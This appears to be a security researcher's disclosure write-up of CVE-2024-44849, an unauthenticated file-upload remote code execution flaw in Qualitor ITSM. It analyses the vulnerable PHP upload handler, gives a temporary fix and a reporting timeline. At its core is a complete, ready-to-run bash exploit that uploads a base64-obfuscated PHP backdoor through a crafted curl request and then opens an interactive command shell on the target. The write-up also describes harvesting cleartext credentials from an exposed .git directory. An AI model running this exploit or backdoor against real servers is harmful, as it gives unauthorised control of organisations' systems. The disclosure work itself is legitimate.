CVE-2024-44849 - Unauthenticated RCE trough Unrestricted File Upload
CVE-2024-44849 - CRITICAL Unauthenticated RCE trough Unrestricted File Upload (<= Qualitor 8.24)
Last updated
Was this helpful?
CVE-2024-44849 - CRITICAL Unauthenticated RCE trough Unrestricted File Upload (<= Qualitor 8.24)
Last updated
Was this helpful?
Before we move on to the technical details, it is important to understand what a CVE is. I have written a brief summary in the text below, in case you would like to know a little more.
Qualitor is an ITSM software offered in the B2B (Business-To-Business) model. This means that other companies purchase the "Qualitor ITSM" license from the company "Qualitor Software e Servicos de Informatica S/A".
Qualitor ITSM has a large market share in Rio Grande do Sul, which is the 6th largest state in Brazil, and it is normally hosted on-premises, and deployment can be done by the Qualitor team for a small service fee.
Some time ago, I was creating new dorks to use in the Bug Bounty programs, when I found an exposed web server with Directory Listing enabled:
By accessing this server, it was possible to identify a exposed .git directory:
Exploring the exposed directory, I identified cleartext credentials that could be used to gain access to the Qualitor ITSM source code:
Using the same exposed URL with credentials, it was possible to obtain access to the Qualitor ITSM source code:
Since this is an ITSM, users are expected to be able to attach files to tickets, so I looked for a file that had file upload functions. When I found a file, I compared it with another random ITSM file, where I identified that this PHP file for file uploads did not have any access control mechanisms:
After identifying the absence of access control mechanisms, I discovered that a file upload algorithm vulnerable due to a lack of restrictions based on file heuristics or characteristics:
This flaw allows an attacker to upload any file type to the server without validation, posing a significant security risk. Without proper checks in place, an attacker could potentially upload malicious files (such as scripts or executables) that can later be executed or abused, leading to unauthorized access, privilege escalation, or code execution.
Now, let's see how this vulnerability arises in more technical details:
Line 12: $tempFile = $_FILES['fleArquivo']['tmp_name'];
This line stores the temporary path of the uploaded file. At this point, no validation is performed to check the type, content, or integrity of the file, making it the first point where improper handling begins.
Line 113: $storeFolder = $_REQUEST['nmdiretoriorede']."/" . $_FILES['fleArquivo']['name'];
Here, the destination path for the file is constructed, directly using user-provided input ($_REQUEST['nmdiretoriorede']
) and the original file name without any sanitation. This can lead to directory traversal attacks or file overwrites if not properly secured.
Line 115: $retorno = move_uploaded_file($tempFile, $storeFolder);
This function moves the file from its temporary location to the final destination on the server. Since no validation was performed before this, any file type, including potentially dangerous files, could be successfully uploaded to the server.
To demonstrate the impact of this vulnerability in a practical way, I developed an exploit capable of automatically exploiting it and gaining access to a terminal within any host with Qualitor, without any type of authentication:
#!/bin/bash
# Author: Extencil <extencil@extencil.me>
# Date: September, 2024.
#
# CVE-2024-44849 Unauthenticated Remote Code Execution Exploit
echo "
Qualitor Web <= 8.24 RCE Exploit v1.0 (CVE-2024-44849)
By Extencil <extencil@extencil.me>, September 2024.
Using this program to attack or compromise any company or system without mutual consent is illegal. The author of this code does not take any responsibility for any misuse or illegal activities conducted using this software. It is intended for educational purposes and authorized testing only. Always ensure you have proper authorization before conducting any security assessments.
"
URL=$1
if [ $# -lt 1 ]; then
echo "
Usage:
$0 <url>
$0 https://csc.extencil.me/html/ad/adfilestorage/request/checkAcesso.php
"
else
echo "[*] Exploiting the target.."
# Define the file name and malicious content
FILENAME=$(< /dev/urandom tr -dc 'a-z0-9' | head -c 16)".php"
MALICIOUS_CODE='<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>' # The Hackers Choice <thc.org> Smallest PHP Backdoor
BACKDOOR_URL=$(echo $URL | sed 's/checkAcesso.php$//')"$FILENAME"
# Boundary for multipart/form-data
BOUNDARY="---------------------------QUALITORspaceCVEspace2024space44849"
# Create the POST request with curl using inline file content
echo "[*] Sending the backdoor.."
curl -X POST $URL -s --insecure \
-H "Cookie: XDEBUG_SESSION=ECLIPSE_DBGP; XDEBUG_SESSION=ECLIPSE_DBGP; B_protocol=https%3A; XDEBUG_SESSION=ECLIPSE_DBGP; SOLICITANTE=false; _LOGIN_SOLICITANTE_=padrao; ATENDENTE=false; session820=" \
-H "Content-Type: multipart/form-data; boundary=$BOUNDARY" \
--data-binary "--$BOUNDARY
Content-Disposition: form-data; name=\"idtipo\"
2
--$BOUNDARY
Content-Disposition: form-data; name=\"nmfilestorage\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmdiretoriorede\"
.
--$BOUNDARY
Content-Disposition: form-data; name=\"nmbucket\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmaccesskey\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmkeyid\"
--$BOUNDARY
Content-Disposition: form-data; name=\"fleArquivo\"; filename=\"$FILENAME\"
$MALICIOUS_CODE
--$BOUNDARY
Content-Disposition: form-data; name=\"cdfilestorage\"
--$BOUNDARY--"
echo
echo
echo "[*] Target is vulnerable if 'Upload realizado com sucesso'."
echo
while true; do
read -p "(backdoor@qualitor): $ " BackdoorCommand
if [[ "$BackdoorCommand" == "exit" ]]; then
echo "Exiting..."
break
fi
curl $BACKDOOR_URL -d 0="$BackdoorCommand"
done
fi
Also available on GitHub: https://github.com/extencil/CVE-2024-44849
As of this moment, I have not received a formal response from the Qualitor team to mitigate this vulnerability.
However, you can TEMPORARILY mitigate this vulnerability by adding the code below to the checkAcesso.php
file:
include("../../../../autentica.php");
Before (without fix) ❌❌❌:
After (with fix) ✅✅✅:
The code above imports Qualitor's native access control component, which is responsible for checking only if the user is authenticated, but authenticated users can still exploit this vulnerability (regular user, without admin permissions).
This is not and should not be considered a definitive fix, but it is the most I can do to help protect your infrastructure until there is a formal response from the Qualitor team.
This vulnerability was not cataloged by MITRE at the time I identified it. This vulnerability was identified in June 2024 and immediately reported to the company through several channels:
LinkedIn: I contacted the IT and Infrastructure coordinators, no response.
WhatsApp: I contacted the support team via Qualitor's corporate number, no response (they only respond to WhatsApp for their customers)
E-mail: I sent e-mails to the contact addresses registered in Registro.BR's national whois database, but I also received no response.
Timeline in format: MM-DD-YYYY (Month, Day, Year)
06-03-2024 - Vulnerability Found
06-05-2024 - Vulnerability Reported via E-mail Domain Contact
06-17-2024 - Vulnerability Reported via LinkeDin
06-24-2024 - Vulnerability Reported via WhatsApp (Found the number on their website)
07-01-2024 - Vulnerability Reported via E-mail again..
# Since no response from Qualitor, reported the vuln to MITRE Corporation
08-18-2024 - Vulnerability Reported to MITRE Corporation via CVE Form
09-06-2024 - Vulnerability Accepted by MITRE Corporation (Private Disclosure)
09-09-2024 - Vulnerability Published by MITRE Corpoation (Public Disclosure)
I would like to thank my friends for their suggestions for registering this CVE.
Musa Attalah from NAVA;
Messede from The Hackers Choice;
Skyper from The Hackers Choice;
Clonazepunk from The Hackers Choice.